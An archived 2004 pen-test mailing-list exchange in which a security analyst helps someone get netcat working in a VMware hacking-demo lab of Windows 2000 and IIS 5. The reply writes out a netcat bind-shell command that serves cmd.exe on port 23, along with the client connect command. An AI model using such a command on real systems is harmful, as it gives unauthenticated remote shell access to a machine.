RE: Hacking Demo and Test Lab

From: Grissett, Chris CONT Ciber (Chris.Grissett.Ciber_at_usarc-emh2.army.mil)
Date: 06/11/04

  • Next message: Lachniet, Mark: "Cheap antennas" 
    To: raza sharif <raza@raza.demon.co.uk>, pen-test@securityfocus.com
Date: Fri, 11 Jun 2004 10:59:03 -0400

    I guess I should have included a working example:

    Assuming that you already have nc on the 2000 box, run this command:

    nc -l -p 23 -t -e cmd.exe

    Then on your xp box run this command:

    nc xxx.xxx.xxx.xxx 23

    replace the x's with the ip of the 2000 server box. The 23 is for the port
    you assigned it earlier.

    Oh, when you installed 2000 server, what type of connection did you choose.
    You should choose to have 2000 server have direct access to the host's
    Ethernet card and its connections. Do you have any personal firewalls
    running at all? Are these two machines connected via a hub or switch.

    Christopher Grissett
    Security Analyst
    Network Enterprise Security Team

    -----Original Message-----
    From: raza sharif [mailto:raza@raza.demon.co.uk]
    Sent: Friday, June 11, 2004 7:42 AM
    To: pen-test@securityfocus.com
    Subject: Hacking Demo and Test Lab

    Hi Folks ,

    Im doing some advanced Hacking Demos for management and also Corporates etc.

    I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

    Im using Webdav and other exploits that all basically should spawn a shell
    using netcat.

    Im using XP as my attacking machine.

    Prob at the moment is Netcat will not spawn a shell regardless of what i
    try.

    Any ideas ? i checked the install it is windows 2000 500.1295 no reference
    to service packs etc. it's a default install.

    Also what are good demo's etc to run to show real hacking on windows 2000 ,
    iis etc..that i can get to work

    thanks

    Raza

    Raza@raza.demon.co.uk

  • Next message: Lachniet, Mark: "Cheap antennas"

    Relevant Pages

    • Re: Cannot get FTP to Work - disconnects
      ... Connection closed by remote host ... This is an immediate action by the server, ... IIS ftp config is simple, just that the network part is really mess up. ... When I connect from a different server I can run any FTP command. ...
      (microsoft.public.inetserver.iis.ftp)
    • Re: New to VPN...
      ... I have already mapped the drive to a folder on the server with the command ... VPN connection doesn't work, ... you have to word them like a server administrator would, ...
      (microsoft.public.windows.server.general)
    • Re: New to VPN...
      ... I have already mapped the drive to a folder on the server with the command ... VPN connection doesn't work, ...
      (microsoft.public.windows.server.general)
    • Re: Is this possible?
      ... running on the server, and is the driver being used too. ... same error: Command contains unrecognized phrase/keyword. ... closes a single table in the specified work area. ... FoxPro command to close the table before I close the connection? ...
      (microsoft.public.fox.programmer.exchange)
    • RE: Your message did not reach some or all of the intended recipie
      ... In your details you are saying to type the following command ... > SMTP telnet session. ... When the issue happens again, in the Exchange Server, please telnet ... > times to close the connection to the server and leave the Telnet session ...
      (microsoft.public.windows.server.sbs)